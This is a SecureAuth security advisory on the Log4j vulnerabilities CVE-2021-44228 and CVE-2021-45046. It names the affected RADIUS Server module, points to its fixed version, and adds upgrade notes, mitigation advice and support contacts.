SecureAuth security advisory – Apache Log4j vulnerability

Updated: December 15, 2021

On December 9, 2021, information about a critical unauthenticated RCE vulnerability (CVE-2021-44228), that affects Java logging package log4j, was tweeted and a proof-of-concept (PoC) was posted on GitHub. This vulnerability could allow attackers full control of the affected server if a user-controlled string is logged. Since it is so easily exploited, the impact of this vulnerability is severe. The vulnerability is already being actively exploited in the wild.

While some SecureAuth products do utilize Apache Log4j in some components, the following products are not using the vulnerable class directly within them:

  • SecureAuth Identity Platform release 9.x through 21.04

  • Login for Endpoints

  • SecureAuth Authenticate app (Android and iOS)

  • Adaptive Authentication

The one remaining module that is potentially affected is the SecureAuth RADIUS Server.  In some instances, it could be compromised with the proof-of-concept that was released.

Our Engineering department has resolved the issue with the latest version of the SecureAuth RADIUS Server, which you can download from the SecureAuth Product Downloads page.

For upgrade instructions, see Upgrade SecureAuth IdP RADIUS Server to v20.12.

Note

RADIUS Server upgrade known issue:

SecureAuth RADIUS server v20.12 sometimes has issues when importing config files that were exported from RADIUS server v20.03 or 20.06 with a shared secret configured for a RADIUS client. (No issues exist if RADIUS server v20.03 or 20.06 was configured with a general shared secret set on the RADIUS Server Settings page.

Workaround: Set the shared secret for each v20.12 RADIUS client again.

In addition the RADIUS server upgrade, you might consider implementing firewall rules to restrict the RADIUS server to communicate only with known trusted destinations.  We also recommend sending the RADIUS logs to a centralized logging solution that can scan for the indicators of compromise.

Update

A new vulnerability in Apache Log4j version 2.15.x and previous (https://nvd.nist.gov/vuln/detail/CVE-2021-45046) was published on December 14, 2021.

The fix SecureAuth released on December 14, 2021 remediates this new vulnerability as well.

Questions?

If you have questions or require assistance upgrading your RADIUS server, please contact SecureAuth Support:

Support Portal: support.secureauth.com

Email: support@secureauth.com

Phone: (866) 859-1526